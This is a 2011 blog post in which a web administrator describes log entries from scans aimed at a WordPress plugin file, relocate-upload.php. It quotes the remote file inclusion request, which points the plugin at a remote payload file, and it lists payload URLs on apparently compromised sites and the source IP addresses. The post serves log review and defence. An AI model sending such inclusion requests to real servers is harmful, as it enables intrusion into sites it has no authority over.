Search

Recent Posts

Tags


« | Main | »

WordPress-Php hacking via plugin: relocate-upload.php

By Dale Reagan | September 19, 2011

Do you check your Apache/Web-Server logs for errors?  Today I noted:

This appears to be a scan for a WordPress (non-core) plugin written in ~2009 – which some users may be using (based on WordPress.org download stats only a few thousand downloads.)

CAVEATsince IP addresses can be spoofed/masked/hidden and proxies might be in use then it is quite possible the that IP addresses and domains shown are not having ‘security issues’ – I will err on the side of caution and make appropriate server-level changes…  [I have inserted/added more-or-less random space characters into the IPs and domains listed below.]

If you find similar activity in your logs what can you do about it?

Search your logs for ‘relocate-update.php’ – any hits?  Same destination/source IPs?

http://www.your_domain.com/some_path/relocate-updload_URI_variants_Below, i.e.

relocate-upload.php? ru_folder=asdf&abs path=http://ComprosiedHost/SOME_PATH/byroe.jpg??

Another URI variation – Note this is one very long URI…:

  1. %3A%2F%2FYOUR_DOMAIN.com%2F2010%2F02%2FA_Valid_URL_on_YOUR_Site%2F',
  2. '4','10','%2Frelocate-upload%2F',''
  3. ,%20'00a54037c6512959ef4bddf710962437d05a45a01c513e7e8564',%200)
  4. //plugins/relocate - upload/relocate - upload.php?ru_folder=asdf& abspath=test??

 

The Domains/systems below are either compromised OR actively supporting malicious-type activity on 9/18/2011.

The requested-target/malicious URL included 9 variants with from 6 to 184 access attempts per URL.

########################################################
 1.  10 | 20 0.67.7 6.230/moodle/backup/bb/c.txt
 2.   6 | carter- tech. com.au/components/com_user/views/user/tmpl/fol.txt
 3.  20 | ctrox. com/wp-content/themes/naked/cache/input.jpg
 4.  20 | ctrox .com/wp-content/themes/naked/cache/output.jpg
 5.  14 | maloes tado .com/logo2.jpg
 6.  18 | www.scooterh eaven. nl/images/space.gif
 7.  12 | www.unionde consumi dores. com/picture_library/tile.jpg
 8. 184 | www.webga te1. net/administrator/templates/khepri/images/logo.png/allnet.jpg
 9. 183 | www.web gate1 .net/administrator/templates/khepri/images/logo.png/byroe.jpg
########################################################

GeoIP info for above, possibly malicious/compromised systems:

########################################################
 1. 200 .67. 76.2 30    |  MX, 14, Guadalajara,
 2. cart er-tech. com.au |  SG, N/A, N/A, N/A
 3. ctrox. com        |  US, MT, Missoula, 59803
 4. mal oestado .com   |  CA, ON, Toronto
 5. scoot erheaven .nl |  NL, N/A, N/A
 6. union decon sumidores. com |  ES, N/A, N/A
 7. webg ate1 .net     |  CA, BC, New Westminster
########################################################

GeoIP info for and the Number of Web requests originated from the IPs listed below.

########################################################
 1.   6 | 50.9 7.21 2.202    |  US, TX, Dallas, 75207
 2. 120 | 64.11 8.88.213    |  US, NJ, Old Bridge, 08857
 3.  18 | 69. 16.2 26.84     |  US, MI, Lansing, 48917
 4.  30 | 82.2 07.74.48     |  UA, N/A, N/A, N/A
 5. 105 | 84.24 4.149.86    |  NL, N/A, N/A, N/A
 6.  56 | 90.8 3.31.1       |  FR, N/A, N/A, N/A
 7.  42 | 91.20 3.69.160    |  LV, N/A, N/A, N/A
 8.  45 | 117.1 21.2 22.41   |  TH, 40, Bangkok
 9.  68 | 186.42.103.178   |  EC, 18, Quito, N/A
10.  71 | 189.5 9.8.23      |  BR, 21, Rio De Janeiro
11.  99 | 190 .25.2 32.196   |  CO, 33, Bogot
12.  30 | 203. 146.24 9.147  |  TH, 40, Bangkok
########################################################

Topics: System and Network Security, Unix-Linux-Os, Web Problem Solving, Web Technologies | Comments Off on WordPress-Php hacking via plugin: relocate-upload.php

Comments are closed.


________________________________________________
YOUR GeoIP Data | Ip: 73.21.121.1
Continent: NA | Country Code: US | Country Name: United States
Region: | State/Region Name: | City:
(US only) Area Code: 0 | Postal code/Zip:
Latitude: 38.000000 | Longitude: -97.000000
Note - if using a mobile device your physical location may NOT be accurate...
________________________________________________

Georgia-USA.Com - Web Hosting for Business
____________________________________